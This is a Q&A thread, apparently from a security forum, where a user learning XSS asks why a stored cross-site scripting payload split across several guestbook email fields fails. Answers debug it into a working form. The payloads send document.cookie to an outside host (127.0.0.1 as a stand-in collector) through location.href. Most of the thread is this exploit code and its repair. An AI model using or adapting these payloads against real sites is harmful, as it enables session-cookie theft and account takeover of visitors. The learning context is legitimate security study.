# Learning XSS: Why is my javascript ignored?

Tags: web-application, web-browser, xss

```
<a href='mailto:</a><script>/*'></a><script>/*</a>:
 <br>   
<hr>
<a href='mailto:*/location.href=/*'>*/location.href=/*</a>: 
<br>
<hr>
<a href='mailto:*/"http://127.0.0.1/"/*'>*/"http://127.0.0.1/"/*</a>:
 <br>
<hr>
<a href='mailto:*/+document.cookie;/*'>*/+document.cookie;/*</a>:   
 <br>
<hr>
<a href='mailto:*/</script><a>'>*/</script><a></a>
```

I'm injecting into a guestbook setup where the XSS is injected by changing the email address. The email max length is short enough where I have to spread across multiple posts. When testing, I'm able to execute alert(1); but when I have to spread a more complicated expression over multiple lines, things break. What am I missing?

Comment: I think you mixed up `>` and `'` in the first line.

Comment: I think you're right. I had been doing some testing with vim and must not have changed things back completely.

Answer (score 3, accepted):

With the comments removed, your code looks like this:

```
<a href='mailto:</a><script>location.href=location.href="http://127.0.0.1/""http://127.0.0.1/"+document.cookie;+document.cookie;</script><a>'>*/</script><a></a>
```

This results in a syntax error, which prevents the code from running.  Particularly, the `""` is problematic, triggering a SyntaxError for "Unexpected string."

Comment: Moving the concatenation from `document.cookie` to `"http://127.0.0.1/"` should work: `</a><script>/*`, `*/location.href=/*`, `*/"http://127.0.0.1/"+/*`, `*/document.cookie;/*`, and `*/</script>`. This would end up with `location.href=location.href="http://127.0.0.1/"+"http://127.0.0.1/"+document.cookie;document.cookie;`

Comment: I see. I had been thinking all of the HTML within and including the <a> tags was getting filtered out. I didn't realize that the comments are being reflected in two places effectively. Seeing as how my inputs are reflected in two places, what is the best method for being able to inject JS? This seems like a difficult limitation to work around.

Comment: @Chris Do the mentioned fractions not work?

Comment: Unfortunately, no.

Comment: @Chris I think the first should read `'></a><script>/*`.

Answer (score 1):

Assuming that this is the code that is displayed on the webpage, I would say that the URL you pass to `location.href` is malformed which makes the Javascript crash. Hence, nothing happen. Your code if you reformat it and remove the comments look like that (and there seems to have a typo for the `>` character on the first line...)

```
<a href='mailto:</a><script>/*>'</a><script>location.href="http://127.0.0.1/"+document.cookie;</script><a></a>
```